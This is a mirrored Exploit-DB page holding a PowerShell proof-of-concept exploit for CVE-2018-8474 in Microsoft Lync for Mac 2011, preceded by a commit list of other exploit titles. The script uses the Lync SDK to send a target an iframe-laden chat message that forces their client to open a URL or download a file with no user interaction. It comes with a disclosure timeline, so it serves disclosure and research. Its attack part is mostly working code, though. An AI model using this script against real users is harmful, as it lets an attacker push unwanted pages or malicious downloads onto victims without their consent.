bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/dos/45936.ps1
Offensive Security 60710bbfd9 DB: 2018-12-05 
19 changes to exploits/shellcodes

Microsoft Lync for Mac 2011 - Injection Forced Browsing/Download
Wireshark - 'cdma2k_message_ACTIVE_SET_RECORD_FIELDS' Stack Corruption
Wireshark - 'find_signature' Heap Out-of-Bounds Read
Xorg X11 Server (AIX) - Local Privilege Escalation
Emacs - movemail Privilege Escalation (Metasploit)
OpenSSH < 7.7 - User Enumeration (2)
HP Intelligent Management - Java Deserialization RCE (Metasploit)
Rockwell Automation Allen-Bradley PowerMonitor 1000 - Incorrect Access Control Authentication Bypass
DomainMOD 4.11.01 - Owner name Field Cross-Site Scripting
NEC Univerge Sv9100 WebPro - 6.00 - Predictable Session ID / Clear Text Password Storage
KeyBase Botnet 1.5 - SQL Injection
Dolibarr ERP/CRM 8.0.3 - Cross-Site Scripting
DomainMOD 4.11.01 - Custom Domain Fields Cross-Site Scripting
DomainMOD 4.11.01 - Custom SSL Fields Cross-Site Scripting
NUUO NVRMini2 3.9.1 - Authenticated Command Injection
DomainMOD 4.11.01 - Registrar Cross-Site Scripting
FreshRSS 1.11.1 - Cross-Site Scripting

Linux/x86 - /usr/bin/head -n99 cat etc/passwd Shellcode (61 Bytes)
Linux/x64 - Reverse (0.0.0.0:1907/TCP) Shell Shellcode (119 Bytes)
2018-12-05 05:01:44 +00:00

91 lines
No EOL
2.9 KiB
PowerShell
Raw Blame History

# Exploit Title: Microsoft Lync for Mac 2011 Injection Forced Browsing/Download
# Author: @nyxgeek - TrustedSec
# Date: 2018-03-20
# Vendor Homepage: microsoft.com
# Software Link: https://www.microsoft.com/en-us/download/details.aspx?id=36517
# CVE: CVE-2018-8474
# Version: Lync:Mac 2011 14.4.3, likely earlier versions
# Tested on: Lync:Mac 2011 14.4.3 (170308)
# Description:
# Force browsing or download via embedded iframe in a chat window. No user
# interaction required. When the iframe contains a web site URL, a new browser
# window of the default browser will open with the URL.
# If the URL is a file, it will download it automatically if it is a permitted
# file type (e.g., zip)
# A write-up can be found at:
# https://www.trustedsec.com/2018/09/full-disclosure-microsoft-lync-for-mac-2011-susceptible-to-forced-browsing-download-attack/
# Requirements: Originating machine needs Lync 2013 SDK installed
# (https://www.microsoft.com/en-us/download/details.aspx?id=36824)
# Timeline of Disclosure:
#
# 07/18/2017 - Reported issue to Microsoft
# 11/22/2017 - Microsoft has reproduced problem
# 03/07/2018 - Microsoft replies that they have decided not to fix, but gave
# their blessing for disclosure
#target user
$target = "user@domain"
$message = "<iframe src='https://www.youtube.com/watch?v=9Rnr70wCQSA'></iframe>"
if (-not (Get-Module -Name Microsoft.Lync.Model))
{
try
{
# you may need to change the location of this DLL
Import-Module "C:\Program Files\Microsoft Office\Office15\LyncSDK\Assemblies\Desktop\Microsoft.Lync.Model.dll" -ErrorAction Stop
}
catch
{
Write-Warning "Microsoft.Lync.Model not available, download and install the Lync 2013 SDK http://www.microsoft.com/en-us/download/details.aspx?id=36824"
}
}
# Connect to the local Skype process
try
{
$client = [Microsoft.Lync.Model.LyncClient]::GetClient()
}
catch
{
Write-Host "`nYou need to have Skype open and signed in first"
break
}
#Start Conversation
$msg = New-Object "System.Collections.Generic.Dictionary[Microsoft.Lync.Model.Conversation.InstantMessageContentType, String]"
#Add the Message
$msg.Add(1,$message)
# Add the contact URI
try
{
$contact = $client.ContactManager.GetContactByUri($target)
}
catch
{
Write-Host "`nFailed to lookup Contact"$target
break
}
# Create a conversation
$convo = $client.ConversationManager.AddConversation()
$convo.AddParticipant($contact) | Out-Null
# Set the message mode as IM
$imModality = $convo.Modalities[1]
# Send the message
$imModality.BeginSendMessage($msg, $null, $imModality) | Out-Null
# End the Convo to suppress the UI
$convo.End() | Out-Null
Write-Host "Sent the following message to "$target":`n"$message
Reference in a new issue View git blame Copy permalink